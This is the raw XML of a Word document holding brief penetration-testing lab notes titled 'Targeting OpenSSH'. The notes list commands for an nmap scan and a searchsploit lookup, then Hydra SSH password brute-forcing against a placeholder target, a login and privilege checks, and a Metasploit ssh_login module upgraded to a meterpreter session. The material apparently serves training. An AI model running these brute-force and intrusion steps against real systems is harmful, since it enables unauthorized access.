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FB39" w14:textId="2355B027" w:rsidR="00853ABF" w:rsidRPr="00C4159D" w:rsidRDefault="00C4159D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C4159D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Targeting OpenSSH</w:t>
      </w:r>
      <w:r w:rsidRPr="00C4159D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D776CB" w14:textId="77777777" w:rsidR="00C4159D" w:rsidRDefault="00C4159D"/>
    <w:p w14:paraId="286BA49C" w14:textId="6B3CA85C" w:rsidR="00FC45C4" w:rsidRPr="00FC45C4" w:rsidRDefault="00FC45C4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC45C4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DEMO:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117698D8" w14:textId="10369C4D" w:rsidR="00FC45C4" w:rsidRDefault="00FC45C4">
      <w:r>
        <w:t>Nmap -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sC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22 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="191FC2FF" w14:textId="2D737E29" w:rsidR="00FC45C4" w:rsidRDefault="00FC45C4">
      <w:r>
        <w:t xml:space="preserve"># it is important to know that on which </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>os</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> it is running.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E49891" w14:textId="77777777" w:rsidR="00FC45C4" w:rsidRDefault="00FC45C4"/>
    <w:p w14:paraId="244AF8EF" w14:textId="5B770A40" w:rsidR="00FC45C4" w:rsidRDefault="00E67A52">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Searchsploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> OpenSSH 7.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705D44F2" w14:textId="77777777" w:rsidR="00E67A52" w:rsidRDefault="00E67A52"/>
    <w:p w14:paraId="270C7F8C" w14:textId="67EA4A0B" w:rsidR="003419A0" w:rsidRDefault="003419A0">
      <w:r>
        <w:t>Hydra -l vagrant -P /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">/share/wordlists/Metasploit/unix_users.txt </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1726EB55" w14:textId="2BFF107D" w:rsidR="00A25DA3" w:rsidRDefault="00A25DA3" w:rsidP="00A25DA3">
      <w:r>
        <w:t xml:space="preserve">Hydra -l </w:t>
      </w:r>
      <w:r>
        <w:t>Administrator</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -P /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">/share/wordlists/Metasploit/unix_users.txt </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF2089E" w14:textId="77777777" w:rsidR="003419A0" w:rsidRDefault="003419A0"/>
    <w:p w14:paraId="6C1DC3D2" w14:textId="4CA64360" w:rsidR="00A25DA3" w:rsidRDefault="00A25DA3">
      <w:r>
        <w:t xml:space="preserve">Ssh </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vagrant@target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6A8C1E6D" w14:textId="746B45B2" w:rsidR="00A25DA3" w:rsidRDefault="00A25DA3">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>provide</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C673E43" w14:textId="4999FCDB" w:rsidR="00A25DA3" w:rsidRDefault="00A25DA3">
      <w:r>
        <w:t xml:space="preserve">#Get ssh </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidR="00156C04">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00156C04">
        <w:t>shell of kali but the system is window)</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729A1030" w14:textId="29A2DC0B" w:rsidR="00A25DA3" w:rsidRDefault="00A25DA3">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="34A96567" w14:textId="4866C510" w:rsidR="00A25DA3" w:rsidRDefault="00A25DA3">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="41E7F49F" w14:textId="7D4C28E8" w:rsidR="00156C04" w:rsidRDefault="00156C04">
      <w:r>
        <w:t># to get the cmd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032496F9" w14:textId="27967B60" w:rsidR="00156C04" w:rsidRDefault="00156C04">
      <w:r>
        <w:t>Bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30355ED9" w14:textId="0A847697" w:rsidR="00727434" w:rsidRDefault="00727434">
      <w:r>
        <w:t xml:space="preserve">Net </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>localgroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> administrators</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A71F07A" w14:textId="15A793DB" w:rsidR="00727434" w:rsidRDefault="00727434">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">  /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>priv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5DFA3677" w14:textId="33864A95" w:rsidR="00A25DA3" w:rsidRDefault="002444EA">
      <w:r>
        <w:t>Exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1607E8" w14:textId="77777777" w:rsidR="002444EA" w:rsidRDefault="002444EA"/>
    <w:p w14:paraId="5491DC94" w14:textId="0C9C7BDB" w:rsidR="002444EA" w:rsidRDefault="002444EA" w:rsidP="002444EA">
      <w:r>
        <w:t xml:space="preserve">Ssh </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Administrator</w:t>
      </w:r>
      <w:r>
        <w:t>@target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="79873F3C" w14:textId="4F151DBD" w:rsidR="002444EA" w:rsidRDefault="002444EA">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>even</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> if we found the password of administrator, the ssh login is disabled by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>aadministrator</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> which is good practice.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C5E3C2" w14:textId="77777777" w:rsidR="002444EA" w:rsidRDefault="002444EA"/>
    <w:p w14:paraId="2F3F479D" w14:textId="41176393" w:rsidR="002444EA" w:rsidRDefault="002444EA">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A4084C" w14:textId="5B3FCC2F" w:rsidR="002444EA" w:rsidRDefault="002444EA">
      <w:r>
        <w:t xml:space="preserve">Search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ssh_login</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="589E7B0C" w14:textId="34A37C2F" w:rsidR="002444EA" w:rsidRDefault="002444EA">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Use(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>index no)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7AE613" w14:textId="028F76F6" w:rsidR="002444EA" w:rsidRDefault="002444EA">
      <w:r>
        <w:t>Options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FDE7CE" w14:textId="4D32D24D" w:rsidR="002444EA" w:rsidRDefault="002444EA">
      <w:r>
        <w:t>Set USERNAME vagrant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62574E79" w14:textId="11B853A0" w:rsidR="002444EA" w:rsidRDefault="002444EA">
      <w:r>
        <w:t>Set PASSWORD vagrant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53857C22" w14:textId="1361E5FF" w:rsidR="002444EA" w:rsidRDefault="002444EA">
      <w:r>
        <w:t xml:space="preserve">Set RHOSTS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1E061DA8" w14:textId="6B6219E1" w:rsidR="002444EA" w:rsidRDefault="002444EA">
      <w:r>
        <w:t>Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEDD562" w14:textId="57229150" w:rsidR="002444EA" w:rsidRDefault="002444EA">
      <w:r>
        <w:t># it open ssh session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440FA539" w14:textId="77777777" w:rsidR="002444EA" w:rsidRDefault="002444EA"/>
    <w:p w14:paraId="386B1B6D" w14:textId="06088680" w:rsidR="002444EA" w:rsidRDefault="002444EA">
      <w:r>
        <w:t>Sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0055E91E" w14:textId="0F8642DF" w:rsidR="002444EA" w:rsidRDefault="002444EA">
      <w:r>
        <w:t>Session -u 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6191F868" w14:textId="77B6F40E" w:rsidR="002444EA" w:rsidRDefault="002444EA">
      <w:r>
        <w:t xml:space="preserve"># upgrade to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="474AB1B4" w14:textId="56302C05" w:rsidR="002444EA" w:rsidRDefault="002444EA">
      <w:r>
        <w:t>Sessions 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A20E1E" w14:textId="77777777" w:rsidR="002444EA" w:rsidRDefault="002444EA"/>
    <w:p w14:paraId="4F9CFA17" w14:textId="77777777" w:rsidR="003419A0" w:rsidRDefault="003419A0"/>
    <w:p w14:paraId="64C2F432" w14:textId="77777777" w:rsidR="00FC45C4" w:rsidRDefault="00FC45C4"/>
    <w:sectPr w:rsidR="00FC4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CA"/>
    <w:rsid w:val="000E1709"/>
    <w:rsid w:val="00156C04"/>
    <w:rsid w:val="002444EA"/>
    <w:rsid w:val="003419A0"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="00595B1E"/>
    <w:rsid w:val="00727434"/>
    <w:rsid w:val="00853ABF"/>
    <w:rsid w:val="0095716C"/>
    <w:rsid w:val="00A25DA3"/>
    <w:rsid w:val="00AB04CA"/>
    <w:rsid w:val="00C4159D"/>
    <w:rsid w:val="00E67A52"/>
    <w:rsid w:val="00FC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94F1"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{3D88E8D0-2D3D-410A-9246-BBB4E13D3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88</Words>
  <Characters>752</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>94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22</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-20T05:42:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-20T05:59:00Z</dcterms:modified>
</cp:coreProperties>
</file>